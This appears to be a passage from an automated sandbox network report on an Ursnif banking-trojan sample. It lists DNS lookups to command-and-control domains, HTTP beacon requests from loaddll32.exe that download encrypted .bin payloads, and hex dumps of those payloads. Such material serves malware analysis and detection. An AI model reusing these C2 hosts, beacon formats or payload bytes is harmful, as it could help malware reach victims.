10/07/21-01:34:00.834180 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49862 | 80 | 192.168.2.4 | 194.147.86.221

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Oct 7, 2021 01:32:18.815819979 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815829992 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815835953 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815865993 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815881014 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815906048 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815943956 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815992117 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815996885 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.816034079 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.816041946 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.816071987 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.816119909 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.855792999 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855822086 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855834961 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855851889 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855871916 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855892897 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855914116 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855935097 CEST8049776194.147.86.221192.168.2.4

                                                          UDP Packets

Timestamp                              Source Port  Dest Port  Source IP        Dest IP
Oct 7, 2021 01:32:17.880515099 CEST    49714        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:32:18.173275948 CEST    53           49714      8.8.8.8          192.168.2.4
Oct 7, 2021 01:32:18.824342966 CEST    58028        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:32:18.980140924 CEST    53097        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:32:19.161839008 CEST    53           58028      8.8.8.8          192.168.2.4
Oct 7, 2021 01:32:19.289130926 CEST    53           53097      8.8.8.8          192.168.2.4
Oct 7, 2021 01:32:20.480238914 CEST    49257        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:32:20.772708893 CEST    53           49257      8.8.8.8          192.168.2.4
Oct 7, 2021 01:32:20.812315941 CEST    62389        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:32:20.830039024 CEST    53           62389      8.8.8.8          192.168.2.4
Oct 7, 2021 01:32:23.312601089 CEST    49910        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:32:23.618545055 CEST    53           49910      8.8.8.8          192.168.2.4
Oct 7, 2021 01:33:24.333306074 CEST    64078        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:33:24.352554083 CEST    53           64078      8.8.8.8          192.168.2.4
Oct 7, 2021 01:33:24.362245083 CEST    64079        53         192.168.2.4      208.67.222.222
Oct 7, 2021 01:33:24.379193068 CEST    53           64079      208.67.222.222   192.168.2.4
Oct 7, 2021 01:33:24.381411076 CEST    64080        53         192.168.2.4      208.67.222.222
Oct 7, 2021 01:33:24.399873972 CEST    53           64080      208.67.222.222   192.168.2.4
Oct 7, 2021 01:33:24.429609060 CEST    64081        53         192.168.2.4      208.67.222.222
Oct 7, 2021 01:33:24.448523998 CEST    53           64081      208.67.222.222   192.168.2.4
Oct 7, 2021 01:34:00.486257076 CEST    51255        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:34:00.780658960 CEST    53           51255      8.8.8.8          192.168.2.4
Oct 7, 2021 01:34:09.717750072 CEST    61522        53         192.168.2.4      8.8.8.8
Oct 7, 2021 01:34:10.070925951 CEST    53           61522      8.8.8.8          192.168.2.4

                                                          DNS Queries

Timestamp                              Source IP        Dest IP          Trans ID  OP Code             Name                               Type                  Class
Oct 7, 2021 01:32:17.880515099 CEST    192.168.2.4      8.8.8.8          0x2a0e    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:18.824342966 CEST    192.168.2.4      8.8.8.8          0x4731    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:18.980140924 CEST    192.168.2.4      8.8.8.8          0xa7a5    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:20.480238914 CEST    192.168.2.4      8.8.8.8          0x46cb    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:20.812315941 CEST    192.168.2.4      8.8.8.8          0x2650    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:23.312601089 CEST    192.168.2.4      8.8.8.8          0x5791    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
Oct 7, 2021 01:33:24.333306074 CEST    192.168.2.4      8.8.8.8          0xb091    Standard query (0)  resolver1.opendns.com              A (IP address)        IN (0x0001)
Oct 7, 2021 01:33:24.362245083 CEST    192.168.2.4      208.67.222.222   0x1       Standard query (0)  222.222.67.208.in-addr.arpa        PTR (Pointer record)  IN (0x0001)
Oct 7, 2021 01:33:24.381411076 CEST    192.168.2.4      208.67.222.222   0x2       Standard query (0)  myip.opendns.com                   A (IP address)        IN (0x0001)
Oct 7, 2021 01:33:24.429609060 CEST    192.168.2.4      208.67.222.222   0x3       Standard query (0)  myip.opendns.com                   28                    IN (0x0001)
Oct 7, 2021 01:34:00.486257076 CEST    192.168.2.4      8.8.8.8          0x70a8    Standard query (0)  art.microsoftsofymicrosoftsoft.at  A (IP address)        IN (0x0001)
Oct 7, 2021 01:34:09.717750072 CEST    192.168.2.4      8.8.8.8          0x75b     Standard query (0)  art.microsoftsofymicrosoftsoft.at  A (IP address)        IN (0x0001)

                                                          DNS Answers

Timestamp                              Source IP        Dest IP          Trans ID  Reply Code    Name                               CName  Address          Type                  Class
Oct 7, 2021 01:32:18.173275948 CEST    8.8.8.8          192.168.2.4      0x2a0e    No error (0)  init.icecreambob.com               -      194.147.86.221   A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:19.161839008 CEST    8.8.8.8          192.168.2.4      0x4731    No error (0)  init.icecreambob.com               -      194.147.86.221   A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:19.289130926 CEST    8.8.8.8          192.168.2.4      0xa7a5    No error (0)  init.icecreambob.com               -      194.147.86.221   A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:20.772708893 CEST    8.8.8.8          192.168.2.4      0x46cb    No error (0)  init.icecreambob.com               -      194.147.86.221   A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:20.830039024 CEST    8.8.8.8          192.168.2.4      0x2650    No error (0)  init.icecreambob.com               -      194.147.86.221   A (IP address)        IN (0x0001)
Oct 7, 2021 01:32:23.618545055 CEST    8.8.8.8          192.168.2.4      0x5791    No error (0)  init.icecreambob.com               -      194.147.86.221   A (IP address)        IN (0x0001)
Oct 7, 2021 01:33:24.352554083 CEST    8.8.8.8          192.168.2.4      0xb091    No error (0)  resolver1.opendns.com              -      208.67.222.222   A (IP address)        IN (0x0001)
Oct 7, 2021 01:33:24.379193068 CEST    208.67.222.222   192.168.2.4      0x1       No error (0)  222.222.67.208.in-addr.arpa        -      -                PTR (Pointer record)  IN (0x0001)
Oct 7, 2021 01:33:24.379193068 CEST    208.67.222.222   192.168.2.4      0x1       No error (0)  222.222.67.208.in-addr.arpa        -      -                PTR (Pointer record)  IN (0x0001)
Oct 7, 2021 01:33:24.379193068 CEST    208.67.222.222   192.168.2.4      0x1       No error (0)  222.222.67.208.in-addr.arpa        -      -                PTR (Pointer record)  IN (0x0001)
Oct 7, 2021 01:33:24.399873972 CEST    208.67.222.222   192.168.2.4      0x2       No error (0)  myip.opendns.com                   -      102.129.143.57   A (IP address)        IN (0x0001)
Oct 7, 2021 01:34:00.780658960 CEST    8.8.8.8          192.168.2.4      0x70a8    No error (0)  art.microsoftsofymicrosoftsoft.at  -      194.147.86.221   A (IP address)        IN (0x0001)
Oct 7, 2021 01:34:10.070925951 CEST    8.8.8.8          192.168.2.4      0x75b     No error (0)  art.microsoftsofymicrosoftsoft.at  -      194.147.86.221   A (IP address)        IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • init.icecreambob.com
                                                          • art.microsoftsofymicrosoftsoft.at

                                                          HTTP Packets

Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
0           192.168.2.4  49776        194.147.86.221   80                C:\Windows\System32\loaddll32.exe
Timestamp                              kBytes transferred  Direction  Data
Oct 7, 2021 01:32:18.233037949 CEST    1596                OUT        GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
Oct 7, 2021 01:32:18.712804079 CEST    1597                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:18 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 194704
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3202a5f19.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 94 88 7c 25 28 17 00 c4 63 f0 06 1c 3b e8 95 8b ba be e6 78 80 40 2e e8 92 09 78 d3 be bf 0b c7 98 ce 6c 02 f6 4f 2e dc a2 6d 17 4b 99 a2 72 cd dd 48 40 a0 0b 9a b0 3a 13 31 02 61 ed b5 a2 45 3d ba c7 d3 54 37 ae 50 dc 54 cd e7 31 c8 4e e2 86 81 0f a8 fa cf 3d af 72 64 2b cd 53 7d f5 d8 85 3a 44 bf 3e 5e 42 6e c2 f2 01 42 39 1a d0 bd e1 e9 4f cf 0d 6f 1a 5c a4 1f 4d 9e 53 3e f8 8a 9d cb 39 8d c1 3e 52 69 02 36 3a 44 9d 07 e7 3f 42 be ec ef f3 98 15 c8 c5 96 9b ca 42 8f be 41 63 c7 58 d6 bf 48 8e 37 c9 0e 31 a5 ad 55 88 7f 1f 4d 43 36 cd b2 3b 1d a7 b0 9f 1b 4e 5c 65 cc 08 e7 c8 bb 20 d4 9b d3 71 46 b3 b8 ea 19 bf a8 f9 86 4c 1c c9 50 f2 97 52 05 e3 9f e2 25 ba 6b 79 9c 28 a0 88 a8 7d 98 8e 17 05 15 9b 76 e3 5d 62 bd 23 46 7d 36 b2 2b eb 02 f7 49 61 7a b7 10 12 10 45 37 23 db 1e 93 72 f1 d6 e1 16 db e1 e9 73 7f 36 32 66 95 83 c8 6e c4 95 7f 2f 57 99 17 97 83 9d 5f 8d 11 be 55 1f be 0c 6b 62 5c 8e 1d 82 68 e5 24 0a d8 de b4 d1 05 43 97 7e aa 01 75 71 59 f3 bf b5 d5 f1 22 de 50 ae 78 af a3 3b ea d2 9d cd 20 b2 6c 68 02 cd 8e 8e 51 47 35 a7 5f c7 6d cf f1 34 be 2f 32 1b c7 26 4a a8 9b 71 d5 cc 17 09 71 c6 48 13 49 03 5a 6c 17 f9 84 e7 ac 7a 57 d3 a3 e9 62 46 b9 48 98 0b 48 15 4f d5 46 84 85 04 c2 4a 78 8b 9a a2 82 9b 2f ae f9 94 9d 58 12 50 de a6 9b 3f 4b 5c 47 3c 89 3f 88 90 6f 86 cc 7b b7 2c cc 35 1a 93 cd 47 d9 5f c9 47 52 d7 ad 08 58 e1 3c 18 0e 57 57 ad 86 75 dc 57 21 e5 d1 ed b8 3c 0b f5 dc 12 32 51 d3 fa 26 66 da 8f 2e 6f 6c d5 43 99 bb 4b cd dd 54 88 32 84 fe 8f 85 3e f8 c8 17 96 1d c5 9a f0 69 19 ea 45 d7 cd 04 cd 6e 2f a7 d0 0c 60 9b 0a 6d 1b 7b 10 2c 53 49 2d 30 d6 e4 d8 bb 37 76 98 f2 6b 69 eb 4b ae 30 ee 00 bb 11 5c a4 3b e7 c1 b1 24 42 71 14 e5 1e 7f 8e 28 9e 3d c1 9e 14 9b 12 ea d7 93 56 67 ea 7c 39 f5 e2 b9 b9 ff fe 69 fc ef ac 34 41 bf 08 66 e5 4c 55 0d f0 f2 fa 78 90 ba 34 ff a6 b8 b8 03 61 e3 b2 67 63 aa 38 1d b9 7f 96 f6 7a 58 2e 4c 2b 63 59 e6 6a 79 54 5b d5 2f 60 29 49 fd ec 82 4d 
61 bf a5 e6 c3 94 cf d5 1c 92 a5 8b d9 e9 3b b0 63 96 87 b3 84 24 9b 07 2b 43 5f 80 26 bc 42 6b 06 5b 19 d6 4c 11 48 9d 39 ea fa 0f 64 ee eb 8b a7 e2 4c 37 3c 0b c7 86 77 eb f8 29 da 5a 8f 41 e2 7b d4 dc 06 46 06 07 90 95 42 13 3f 3e a1 ee 2c 2f 5e 72 95 3f f2 09 e8 3e 9f 6e a6 61 99 b8 02 37 06 9a 3f 66 24 9b be aa 4e eb fd 55 db da 85 6d ed e3 6c 76 2a be 75 34 7d 58 83 2b 1e 8e 5a 11 83 fe 95 24 24 cb a1 07 54 a2 0e 30 bf cb 7c 9b 69 8a d8 2e 91 74 d6 02 d2 af 1c a7 bb 62 76 23 4c f7 72 f2 83 01 f7 5a 5c 06 4f 1c 6f 6f 4c 5e eb 94 20 2f ba 65 96 0e 8f 0d 93 4b 30 04 4c 2e 13 97 a2 93 4e dd 4d 35 97 fc eb ec 3e 45 d3 36 0a 36 2f 8f d6 d3 49 fa 77 2e 82 45 51 d3 c2 bc f0 41 93 36 eb a3 09 65 31 62 82 66 34 31 ce 34 99 99 f3 0c 1a e2 26 f6 f3 f8 df 7e b3 85 2e 58 88 8c d0 69 33 c3 dd ce 14 92 1b 8e 6f 0e 5a 90 fc
                                                          Data Ascii: |%(c;x@.xlO.mKrH@:1aE=T7PT1N=rd+S}:D>^BnB9Oo\MS>9>Ri6:D?BBAcXH71UMC6;N\e qFLPR%ky(}v]b#F}6+IazE7#rs62fn/W_Ukb\h$C~uqY"Px; lhQG5_m4/2&JqqHIZlzWbFHHOFJx/XP?K\G<?o{,5G_GRX<WWuW!<2Q&f.olCKT2>iEn/`m{,SI-07vkiK0\;$Bq(=Vg|9i4AfLUx4agc8zX.L+cYjyT[/`)IMa;c$+C_&Bk[LH9dL7<w)ZA{FB?>,/^r?>na7?f$NUmlv*u4}X+Z$$T0|i.tbv#LrZ\OooL^ /eK0L.NM5>E66/Iw.EQA6e1bf414&~.Xi3oZ


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
1           192.168.2.4  49777        194.147.86.221   80                C:\Windows\System32\loaddll32.exe
Timestamp                              kBytes transferred  Direction  Data
Oct 7, 2021 01:32:19.242465973 CEST    1800                OUT        GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
Oct 7, 2021 01:32:19.686741114 CEST    1802                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 194704
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3203a062c.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 94 88 7c 25 28 17 00 c4 63 f0 06 1c 3b e8 95 8b ba be e6 78 80 40 2e e8 92 09 78 d3 be bf 0b c7 98 ce 6c 02 f6 4f 2e dc a2 6d 17 4b 99 a2 72 cd dd 48 40 a0 0b 9a b0 3a 13 31 02 61 ed b5 a2 45 3d ba c7 d3 54 37 ae 50 dc 54 cd e7 31 c8 4e e2 86 81 0f a8 fa cf 3d af 72 64 2b cd 53 7d f5 d8 85 3a 44 bf 3e 5e 42 6e c2 f2 01 42 39 1a d0 bd e1 e9 4f cf 0d 6f 1a 5c a4 1f 4d 9e 53 3e f8 8a 9d cb 39 8d c1 3e 52 69 02 36 3a 44 9d 07 e7 3f 42 be ec ef f3 98 15 c8 c5 96 9b ca 42 8f be 41 63 c7 58 d6 bf 48 8e 37 c9 0e 31 a5 ad 55 88 7f 1f 4d 43 36 cd b2 3b 1d a7 b0 9f 1b 4e 5c 65 cc 08 e7 c8 bb 20 d4 9b d3 71 46 b3 b8 ea 19 bf a8 f9 86 4c 1c c9 50 f2 97 52 05 e3 9f e2 25 ba 6b 79 9c 28 a0 88 a8 7d 98 8e 17 05 15 9b 76 e3 5d 62 bd 23 46 7d 36 b2 2b eb 02 f7 49 61 7a b7 10 12 10 45 37 23 db 1e 93 72 f1 d6 e1 16 db e1 e9 73 7f 36 32 66 95 83 c8 6e c4 95 7f 2f 57 99 17 97 83 9d 5f 8d 11 be 55 1f be 0c 6b 62 5c 8e 1d 82 68 e5 24 0a d8 de b4 d1 05 43 97 7e aa 01 75 71 59 f3 bf b5 d5 f1 22 de 50 ae 78 af a3 3b ea d2 9d cd 20 b2 6c 68 02 cd 8e 8e 51 47 35 a7 5f c7 6d cf f1 34 be 2f 32 1b c7 26 4a a8 9b 71 d5 cc 17 09 71 c6 48 13 49 03 5a 6c 17 f9 84 e7 ac 7a 57 d3 a3 e9 62 46 b9 48 98 0b 48 15 4f d5 46 84 85 04 c2 4a 78 8b 9a a2 82 9b 2f ae f9 94 9d 58 12 50 de a6 9b 3f 4b 5c 47 3c 89 3f 88 90 6f 86 cc 7b b7 2c cc 35 1a 93 cd 47 d9 5f c9 47 52 d7 ad 08 58 e1 3c 18 0e 57 57 ad 86 75 dc 57 21 e5 d1 ed b8 3c 0b f5 dc 12 32 51 d3 fa 26 66 da 8f 2e 6f 6c d5 43 99 bb 4b cd dd 54 88 32 84 fe 8f 85 3e f8 c8 17 96 1d c5 9a f0 69 19 ea 45 d7 cd 04 cd 6e 2f a7 d0 0c 60 9b 0a 6d 1b 7b 10 2c 53 49 2d 30 d6 e4 d8 bb 37 76 98 f2 6b 69 eb 4b ae 30 ee 00 bb 11 5c a4 3b e7 c1 b1 24 42 71 14 e5 1e 7f 8e 28 9e 3d c1 9e 14 9b 12 ea d7 93 56 67 ea 7c 39 f5 e2 b9 b9 ff fe 69 fc ef ac 34 41 bf 08 66 e5 4c 55 0d f0 f2 fa 78 90 ba 34 ff a6 b8 b8 03 61 e3 b2 67 63 aa 38 1d b9 7f 96 f6 7a 58 2e 4c 2b 63 59 e6 6a 79 54 5b d5 2f 60 29 49 fd ec 82 4d 
61 bf a5 e6 c3 94 cf d5 1c 92 a5 8b d9 e9 3b b0 63 96 87 b3 84 24 9b 07 2b 43 5f 80 26 bc 42 6b 06 5b 19 d6 4c 11 48 9d 39 ea fa 0f 64 ee eb 8b a7 e2 4c 37 3c 0b c7 86 77 eb f8 29 da 5a 8f 41 e2 7b d4 dc 06 46 06 07 90 95 42 13 3f 3e a1 ee 2c 2f 5e 72 95 3f f2 09 e8 3e 9f 6e a6 61 99 b8 02 37 06 9a 3f 66 24 9b be aa 4e eb fd 55 db da 85 6d ed e3 6c 76 2a be 75 34 7d 58 83 2b 1e 8e 5a 11 83 fe 95 24 24 cb a1 07 54 a2 0e 30 bf cb 7c 9b 69 8a d8 2e 91 74 d6 02 d2 af 1c a7 bb 62 76 23 4c f7 72 f2 83 01 f7 5a 5c 06 4f 1c 6f 6f 4c 5e eb 94 20 2f ba 65 96 0e 8f 0d 93 4b 30 04 4c 2e 13 97 a2 93 4e dd 4d 35 97 fc eb ec 3e 45 d3 36 0a 36 2f 8f d6 d3 49 fa 77 2e 82 45 51 d3 c2 bc f0 41 93 36 eb a3 09 65 31 62 82 66 34 31 ce 34 99 99 f3 0c 1a e2 26 f6 f3 f8 df 7e b3 85 2e 58 88 8c d0 69 33 c3 dd ce 14 92 1b 8e 6f 0e 5a 90 fc
                                                          Data Ascii: |%(c;x@.xlO.mKrH@:1aE=T7PT1N=rd+S}:D>^BnB9Oo\MS>9>Ri6:D?BBAcXH71UMC6;N\e qFLPR%ky(}v]b#F}6+IazE7#rs62fn/W_Ukb\h$C~uqY"Px; lhQG5_m4/2&JqqHIZlzWbFHHOFJx/XP?K\G<?o{,5G_GRX<WWuW!<2Q&f.olCKT2>iEn/`m{,SI-07vkiK0\;$Bq(=Vg|9i4AfLUx4agc8zX.L+cYjyT[/`)IMa;c$+C_&Bk[LH9dL7<w)ZA{FB?>,/^r?>na7?f$NUmlv*u4}X+Z$$T0|i.tbv#LrZ\OooL^ /eK0L.NM5>E66/Iw.EQA6e1bf414&~.Xi3oZ


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
2           192.168.2.4  49778        194.147.86.221   80                C:\Windows\System32\loaddll32.exe
Timestamp                              kBytes transferred  Direction  Data
Oct 7, 2021 01:32:19.340179920 CEST    1801                OUT        GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
Oct 7, 2021 01:32:19.811055899 CEST    1894                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 247962
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3203bb666.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 4b 63 5e 38 66 50 d7 31 63 15 5b 39 38 df 50 31 0b 84 05 64 b8 37 51 dd f3 b6 04 c3 16 22 71 14 38 f4 7d b3 44 05 f2 d2 3f 2e 23 27 ff 54 f2 df 8f 4d d1 03 cb 39 22 a7 a0 d6 cf 33 d2 20 69 a7 48 95 51 bb d7 73 af 02 c4 2e c3 eb c8 bd ef 00 ff 65 01 f5 dd 52 c4 15 ba ea 88 99 1e 91 2e 0a c6 42 c0 f8 97 03 9a df 4e 4a fa 1b f1 ab 5d 10 93 0f f1 0b 1b 86 bb 17 2f d8 28 81 d4 bc 33 93 47 c4 d6 b2 46 34 1f b7 95 87 78 ed 5d f1 35 62 a5 7c 49 84 c1 10 21 38 d4 fd a3 9e 7d 2e 8e 56 98 0f ec 30 57 09 0c 01 41 9d 5a b6 de 60 48 26 96 48 42 27 4a a5 80 7f 62 17 fd e2 13 c2 c5 ab 43 a2 f5 2f ad c1 99 58 17 18 a2 3d 52 4f fe 1e ec 29 04 3a e2 7a 26 af 18 24 7a cb de 04 e8 6c 49 05 27 68 d5 78 23 74 2f 0e f9 9e 7e 7f 80 6c 92 24 5f 91 91 0a 48 88 f4 cb 7a dc 12 db 2b 81 11 63 4b ff 15 1c 02 38 d7 b9 b7 2f 84 39 7d f3 6a 4c c0 9b 4a 4d b3 ea 3a 77 d5 8b 93 76 d2 9b 6a 5f 9a 72 d6 56 36 87 03 f4 7c 2a 2f ee 3d 17 74 68 aa 4f d5 c2 df 2d fd ad 9b 32 83 86 20 57 52 11 8c 76 3e 49 2f 9e 49 9a 22 8f 89 17 c8 63 9d bb 90 b5 98 cf 9b 6e 42 e4 b9 b5 bf e6 c7 ec 82 b5 a3 62 a8 a1 10 5b bf 23 02 d1 e7 5c 28 c0 bf 9a f2 ec b8 32 e8 67 87 21 4d cf 7d d2 40 01 0d 17 67 0a 6c 3a 98 bb 13 1f 2c 6c b8 bb 0a de 2a b6 61 d2 fe e3 7d 87 f2 12 a3 8a a1 ac 11 c1 db d5 4c fb 43 98 2a 61 20 4d 94 9c 4d e1 70 56 c5 ac 2b 38 2b b9 2c 8c 98 9d e7 24 c5 e9 18 ab 45 3c e8 29 f8 78 52 d9 f9 71 4a fb ac a5 0e 8c 86 92 01 b1 3e 4c bc 66 9d 84 a0 9c cd 17 e7 3c 16 f2 65 49 50 77 e2 e1 3f 21 6c 31 54 ae a1 f8 e1 4f f6 53 2b 93 b5 02 af 5b 56 3b bf b7 c0 1d 67 da 32 af ee d7 00 dc 05 76 aa b1 8b d2 2b e2 91 fc f8 30 30 0b b0 4b 24 32 18 c0 8b cb 29 ba 69 2f 09 99 6e 4d 5b 1a b7 02 5b ac 62 64 d7 ea ed 1f 5b 68 5d 14 2d f5 03 c4 a8 bf 30 cf 56 29 e9 d4 d7 60 48 2a 99 02 86 80 6a 59 46 42 80 ed 26 f7 3f 49 0f 3d 94 db e5 db 40 9c d2 ff 8f 7c 1c 29 ec 56 ee a5 2d 42 32 15 a1 a2 62 a1 32 ee 09 b8 e6 7f 66 84 54 be 2e 0c 21 03 8f 94 27 ff 29 96 ce e3 
a5 09 75 c1 33 0f fb 23 85 33 2c dd cd 8c 5c 72 a0 84 29 4f c0 b7 5f 77 3f 79 ca 9b a4 8d 0d f7 ca fc 5a 69 ea b1 a9 1d e9 74 60 1b b5 29 e2 24 03 cf b1 6f 5a db b7 48 92 cd f2 fd 8c b9 ce f7 cc 4f 60 03 94 af 86 ab e0 6e bb 16 e6 7f 86 b9 e0 7d ea ed a9 68 a5 a9 ba 8d 73 f5 eb c8 1c 92 4a dd e7 19 31 5f 38 ad db ce f3 ac 7a b2 b5 fe 0a ac e0 41 ec a1 af db 28 94 94 bc 7a c1 ee 19 d3 e4 07 2f a4 68 b7 a3 21 27 b5 62 67 5e 86 79 37 b7 ca 06 9a 89 45 83 98 c8 46 18 d8 74 9b c8 4b ae ef c2 93 32 68 07 14 1a a2 5f 1f 75 76 bb 64 e1 da f2 37 dc 72 1a 13 f5 38 4a ad d5 8b 22 30 d4 8f 94 60 1d 25 e0 dc 31 04 db d5 f8 b3 94 df 0f 4a 60 19 57 bc c4 a3 89 84 04 a6 78 d7 8c 0a 99 e1 be 0b c5 d2 2b 81 da 20 69 2d 8d 72 c2 42 25 d8 21 6e a3 27 05 7f 44 cd 15 98 e1 9b 1b 3c 07 1e f1 1b ce fc ec 5d fb 78 b3 66 7a ca 83 1d a3 61
